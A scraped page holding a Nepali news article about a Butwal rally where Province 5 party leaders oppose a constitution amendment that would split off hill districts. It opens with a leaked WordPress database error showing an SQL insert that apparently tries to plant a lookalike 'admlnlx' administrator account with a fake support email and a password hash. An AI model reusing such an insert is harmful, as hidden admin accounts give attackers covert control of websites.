WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN3U8G7Hdgi0z0myvAzAFtadYJ5dwo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:18:52', '', 'admlnlx', 'admlnlx')
बुटवल,मंसिर १७-
रुपन्देहीको बुटवलमा प्रदेश नम्बर पाँचका नेताहरुले आज(शुक्रबार) सम्बोधन गर्ने भएका छन् । पाँच नम्बर प्रदेशबाट पहाडी जिल्लाहरु टुक्र्याने गरी संशोधन प्रस्ताव ल्याइएको विरोधमा बृहत सभामा एमाले वरिष्ठ उपाध्यक्ष बामदेव गौतम, उपमहासचिव विष्णु पौडेल, घनश्याम भुसाल, एमाले सचिव गोकर्ण विष्ट, नेकपा माओवादी केन्द्रका संसदीय दलका उपनेता टोपबहादुर रायमाझी, कांग्रेस नेता चन्द्र भण्डारीलगायतले संबोधन गर्ने कार्यक्रम रहेको छ ।
सभामा उपस्थितिका लागि एमाले निर्वाचन क्षेत्रीय कमिटी क्षेत्र नं ४ रुपन्देहीले सवैलाइ आग्रह गरेको छ । बिहीबार बसेको क्षेत्रीय कमिटीको बैठकले शुक्रबार बिहान ११ बजेदेखि प्रदेशस्तरीय भेला र २ बजे राजमार्ग चौराहामा सभाको आयोजना गरेको बताएको छ ।
एमाले क्षेत्रीय कमिटी बैठकलाई संबोधन गर्दै पार्टीका केन्द्रीय सदस्य तथा रुपन्देही इन्चार्ज लिला गिरीलाई सभामा जनसहभागिता जुटाउन कार्यकर्ताहरुलाई निर्देशन दिनुभयो । अर्का केन्द्रीय सदस्य खिमलाल भट्टराईले संविधान संशोधन प्रस्ताव राष्ट्रहित विपरित आएकाले फिर्ता नभएसम्म आन्दोलन जारी राखिने बताए ।
बैठकमा एमाले रुपन्देहीका अध्यक्ष शिवराज सुवेदी, क्षेत्रीय कमिटीका कार्यबाहक अध्यक्ष राजेन्द्र ढकाल, सचिव घनश्याम चापागाईं, बुटवल नगर अध्यक्ष ज्ञानेश्वर अर्याललगायतले आन्दोलनलाई शान्तिपूर्ण र सशक्त बनाउनुपर्नेमा जोड दिएका छन् ।